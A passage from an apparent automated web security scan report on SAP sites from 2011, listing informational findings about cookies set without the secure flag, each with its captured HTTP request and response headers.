Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response

HTTP/1.1 302 Moved temporarily
set-cookie: oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut=0y9OLNAHotJM%252FaLUgvzizJL8okr9YiCZqh9cklhUEpCYnqqXUZKbowAA; path=/
set-cookie: sap-usercontext=sap-client=002; path=/
content-type: text/html
content-length: 0
cache-control: no-cache, no-store
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
location: https://accounts.sap.com/saml2/idp/sso/accounts.sap.com?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut
connection: close


8.8. https://training.sap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://training.sap.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:58:52 GMT
Server: Apache
Set-Cookie: ecomssid=fvscn6jrn5dm1p8m0c17ts0du0; path=/; domain=.sap.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=3f868610-479e-adc4-fdf5-6eba419da7ce; expires=Sun, 14-Oct-2012 14:58:52 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; expires=Mon, 14-Oct-2013 14:58:52 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Set-Cookie: UsersDefaultCountry=CA; expires=Mon, 14-Nov-2011 14:58:53 GMT; path=/; domain=.sap.com
Set-Cookie: UsersDefaultLanguage=EN; expires=Mon, 14-Nov-2011 14:58:53 GMT; path=/; domain=.sap.com
Location: /ca/en/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


8.9. https://www.sap.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /WebResource.axd

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebResource.axd HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html
Location: /errorpage.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:25 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/errorpage.epx">here</a>.</h2>
</body></html>

8.10. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 439
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS

{"method":"TrackInteraction","arguments":["https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1","http://store.businessobj
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:19 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:19 GMT


8.11. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; domain=.sap.com; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; domain=.sap.com; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:10 GMT
Content-Length: 149165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...

8.12. https://www.sap.com/contactsap/contact_warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/contact_warning.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactsap/contact_warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:31 GMT
Connection: close


<html>
   <head>
       <title>SAP - Contact SAP Warning</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" cont
...[SNIP]...

8.13. https://www.sap.com/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/index.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactsap/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:01 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:04:01 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fcontactsap%2findex.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/host.epx">here</a>.</h2>
</body></html>

8.14. https://www.sap.com/host.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /host.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /host.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-US10-SGE-FRBUSOPT; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; OriginatingURL=http://www.sapbusinessoptimizer.com/; SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; pmeoriginalurl=%2fhost.epx; pmereturnurl=%2fgwtservice.epx; pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; pmedialogmode=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:16 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:16 GMT; path=/
Set-Cookie: pmelayerurl=; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:15 GMT
Content-Length: 32896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...

8.15. https://www.sap.com/omni.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /omni.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /omni.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO PSA OUR"
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:31 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:32 GMT
Content-Length: 86

var omni_value = '50271dcd-9baa-4ef3-893c-9fb47c6b6fd7';
var omni_ttc = '1318688493';

8.16. https://www.sap.com/profile/captcha.epimg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/captcha.epimg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/captcha.epimg?eqs=80FDF91121181B29096FDBF8C13490FC3D78E210BA998B1C50C73CC97CDD1CB5 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4605
Content-Type: image/jpeg
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:15 GMT

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<...."..............................
...[SNIP]...

8.17. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/login.epx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/login.epx HTTP/1.1
